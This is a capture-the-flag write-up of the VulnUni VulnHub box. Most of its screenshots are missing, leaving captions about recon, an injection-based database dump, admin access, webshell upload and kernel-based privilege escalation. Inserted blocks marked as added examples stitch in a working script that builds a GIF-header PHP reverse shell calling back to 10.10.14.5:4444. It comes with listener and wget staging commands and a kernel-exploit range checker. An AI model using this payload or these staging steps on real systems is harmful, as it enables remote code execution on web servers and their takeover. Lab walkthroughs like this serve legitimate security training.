Sunday, 7 June 2020

VulnUni CTF

It's been a while since I last played a CTF from VulnHub, so today we'll try something nice and easy: a box called VulnUni. Here we go...
Today we'll start here:


I started with a quick port scan using nmap:


Not much indeed. So I started from the beginning ;) Nikto, dirb and gobuster ;) then I crawled more and more resources and found some kind of an e-learning platform:

This was new to me, so I started poking around the app, checking what I could do as an unauthenticated user and so on... and that's how I found:


(There are more bugs like this, so I decided to find a few more.) We'll start here:


A little confirmation:


Part of the DB dump:




TL;DR:


In the meantime I was googling the name of the webapp. It turns out it's pretty exploitable ;)



Since we already have the password(s), let's try them:


Looks good. What about the admin?


Even better! ;) This is where I started looking for an upload form to drop a webshell. Let's see what an admin can do:



Oops... no input filtering on 'server settings' (again ;D)...


Anyway, playing with the app I found that a newly created course is stored in a directory with directory listing enabled:


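That directory listing is what makes the uploaded files so easy to find later. As an added hardening note (not part of the original write-up, and the path is an assumption), this is the Apache setting behind it, with the weak form next to the corrected one:

```apache
# Added example, not from the original post. Directory path is assumed.

# Weak: with Indexes on and no index.php/index.html in the directory,
# Apache renders a listing of every uploaded file, so an attacker can
# locate a dropped webshell without guessing its name.
<Directory "/var/www/html/courses">
    Options Indexes FollowSymLinks
</Directory>

# Corrected: no listing, and PHP files dropped into the upload tree are
# served as plain files instead of being executed.
<Directory "/var/www/html/courses">
    Options -Indexes +FollowSymLinks
    <FilesMatch "\.(php|phtml|phar)$">
        SetHandler none
        ForceType text/plain
    </FilesMatch>
</Directory>
```

Turning off the listing only removes the convenience; the second block is what actually stops an uploaded one-liner from running.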

So I started uploading stuff everywhere I could ;)


Just checking... ;)


The next interesting place I was curious about:



Interestingly, those uploaded files (papers, dropbox, documents) are also listed in the indexed directory, so it was now easier to run a reverse shell from one of them:



The one-liner webshell looks good (but the connection was dropped after the very first command sent to the target). So I zipped the new webshell file and uploaded it again, and this time, for my case, I also prepended the GIF header ('GIF89a') to the file so it still starts with image magic bytes ;) As we can see below, it is now extracted properly:


Now we should be here (for the uploaded one-liner):



So far, so good. I grabbed the flag from the /home directory:


Next, on my Kali VM, I prepared a reverse shell again. This time I served it with python -m SimpleHTTPServer and downloaded it to the remote host:


That's how I got a more stable reverse connection:


To trigger it, just visit the uploaded file in the course directory:


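The two upload steps above (a GIF-header-prefixed PHP file, and a reverse shell fetched over a throwaway HTTP server) are reproduced here as an added example; this is not the author's payload or the platform's code. The PHP body is the classic proc_open reverse-shell one-liner, the listener address 10.10.14.5:4444 and the file names are assumptions.

```shell
# Added example, not from the original post. LHOST/LPORT and file names are assumed.

# Write a GIF/PHP polyglot: the first 6 bytes are the GIF89a signature (what a
# naive header check looks at) and PHP ignores everything before the "<?php" tag.
make_gif_php_revshell() {
  lhost="$1"; lport="$2"; out="$3"
  {
    printf 'GIF89a\n'
    printf '<?php $sock=fsockopen("%s",%s);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes); ?>\n' "$lhost" "$lport"
  } > "$out"
}

# Return 0 if the file both starts with the GIF signature and carries a PHP tag,
# i.e. it would pass a magic-byte check yet still execute if served by PHP.
is_gif_php_polyglot() {
  f="$1"
  [ "$(head -c 6 "$f")" = "GIF89a" ] && grep -q '<?php' "$f"
}

# Optional: archive the payload for upload forms that extract a zip (as done in
# the post); skipped quietly when zip is not installed.
zip_payload() {
  out="$1"
  if command -v zip >/dev/null 2>&1; then
    zip -q "${out%.php}.zip" "$out"
  fi
}

# Print the two commands run on the attacker box: a temporary web server in the
# payload directory and the listener the reverse shell connects back to.
stage_commands() {
  lport="$1"
  echo "python3 -m http.server 8000      # python -m SimpleHTTPServer on Python 2"
  echo "nc -lvnp $lport"
}

# Usage (example values):
#   make_gif_php_revshell 10.10.14.5 4444 shell.php && is_gif_php_polyglot shell.php
#   zip_payload shell.php
#   stage_commands 4444
```

Once the file is in the course directory, requesting it in a browser (as in the post) is what makes PHP execute the one-liner; on the target side, fetching a second-stage shell from the http.server is just `wget http://10.10.14.5:8000/rev.sh` or equivalent.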
A little recon ;]


Maybe we'll use it later... So I downloaded a few tools to enumerate the host:


I think the best enumeration hint on this box comes from uname ;]


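When the hint is the kernel release, the next step is checking it against the version ranges a candidate local exploit is known to affect. As an added example (not from the original post, and making no claim about which kernel this box runs or which exploit applies), the helpers below turn `uname -r` output into a comparable number and collect the few other things worth looking at first; the sample release strings are constructed.

```shell
# Added example, not from the original post. Release strings in comments are constructed.

# Convert a kernel release such as "4.4.0-21-generic" to a single integer
# (4004000) by dropping the "-21-generic" suffix and weighting major.minor.patch.
kver_num() {
  v="${1%%-*}"
  IFS=. read -r maj min pat <<EOF
$v
EOF
  echo $(( ${maj:-0} * 1000000 + ${min:-0} * 1000 + ${pat:-0} ))
}

# Return 0 if release $1 is strictly older than release $2.
kver_lt() {
  [ "$(kver_num "$1")" -lt "$(kver_num "$2")" ]
}

# Return 0 if release $1 lies in the inclusive range [$2, $3], the usual shape
# of an exploit's "affected versions" note.
kver_in_range() {
  k=$(kver_num "$1"); lo=$(kver_num "$2"); hi=$(kver_num "$3")
  [ "$k" -ge "$lo" ] && [ "$k" -le "$hi" ]
}

# Minimal first-pass enumeration on the target: kernel, distro, sudo rights,
# and a handful of SUID binaries. Heavier tools can follow once this is known.
enum_host() {
  echo "kernel:  $(uname -r)"
  [ -r /etc/os-release ] && grep -E '^(PRETTY_NAME|VERSION_ID)=' /etc/os-release
  echo "sudo -l:"
  sudo -n -l 2>/dev/null || echo "  (no passwordless sudo or sudo not available)"
  echo "SUID binaries (first 20):"
  find / -perm -4000 -type f 2>/dev/null | head -n 20
}

# Usage on the target, with a hypothetical affected range:
#   enum_host
#   kver_in_range "$(uname -r)" 4.4.0 4.4.255 && echo "kernel inside the range, test the exploit"
```

The range check is only a filter: a kernel inside a published range still needs the distro's patch level confirmed (Ubuntu backports fixes without bumping the upstream version), so treat a match as "worth trying", not "vulnerable".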
A few last notes, the flag.txt:


I think we can finish this post here. ;]



Special thanks goes to my Patreon: Daniel.
You are AWESOME!




See you next time! ;)

Cheers
